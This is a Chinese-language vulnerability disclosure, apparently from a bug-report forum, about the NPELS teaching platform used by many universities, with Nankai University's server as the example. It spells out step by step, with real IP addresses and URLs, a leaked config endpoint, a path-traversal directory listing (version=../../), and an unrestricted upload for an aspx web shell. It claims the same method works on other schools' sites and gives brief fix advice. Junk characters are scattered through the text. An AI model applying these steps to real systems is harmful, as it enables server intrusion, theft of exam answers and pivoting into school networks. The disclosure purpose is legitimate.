好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
~* u. |: P9 r, C) X9 L; x9 D9 ^- o, z
详细说明:
& S+ N: G" {& r( i* ]) L
6 ]7 M1 m% C! D3 V' S" r8 _9 q" e以南开大学的为例: ; }+ H. H6 _7 C
http://222.30.60.3/NPELS
2 e! W k& r8 m' qNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址! o2 n% a" s9 [7 Q
<setting name="Update_CommonSvr_CommonService" serializeAs="String">% ?0 d/ h' {# c
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
9 S( c4 j8 t1 }$ p</setting>8 J& M9 l" L0 d# H4 ^
及版本号
$ _# ?3 @, r" a* u1 |<add key="TVersion" value="1, 0, 0, 2187">
1 }4 W3 D( e: J' u( g @/ @</add>- W* _8 }' h/ m5 s/ T' r5 e5 M
直接访问7 N4 }3 F2 n1 D+ l* }" E
http://222.30.60.3/NPELS/CommonService.asmx
" N* [4 I9 i! s6 Z2 d2 k# ~; R使用GetTestClientFileList操作,直接 HTTP GET 列目录:# t- B* M5 I6 Z( s
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 21875 J8 c7 f: l. H5 l# h
进一步列目录(返回的网页很大,可以直接 wget 下来)) h# m3 y; o; b- e6 W
http://222.30.60.3/NPELS/CommonS ... List?version=../../
1 ~0 T3 b3 R, J6 P* j# O/ B+ X* q k
: k- T: b& x6 H, \发现, W5 j4 N- e, X, u
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm3 L, _4 O/ \8 C
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
+ E2 U* v' d: I上传后继续列目录找到木马地址直接访问即可
* V9 x- W, r' w$ a/ b
% ?- V0 L/ Z2 q, t: ]5 |OOXX
" n8 ?1 z5 H0 \* C. I2 c; J+ g/ }
, z$ N9 x1 Z9 d& M& I: I! Z$ ?6 kGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
1 Z$ Z0 n2 b3 I% ^漏洞证明:
- G+ m) W! H j+ u 5 _6 G7 O3 Y( Z$ e& @$ O
列目录:+ ^) k: H. y3 i ^8 w% p' g
http://222.30.60.3/NPELS/CommonS ... List?version=../../
. l: | q1 p, S W& g文件上传:
- Y- p7 l# u& p4 dhttp://222.30.60.3/npelsv/editor/editor.htm4 j8 `- n5 e3 t8 p
# @) o$ U. S% V; R/ d上传木马:
7 S2 v6 c# n# V Mhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx* Z( J5 R1 t" g6 @- d
, J" o+ t$ n+ W+ }# q修复方案:5 ]1 K: J N2 C- C
好像考试系统必须使用 CommonService.asmx7 Y9 ~( ?8 Q: g C
最好配置文件加密或者用别的方式不让它泄露出来- c( }* E" T2 R( i
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
5 M/ O9 n8 |4 m* R% n+ _* E |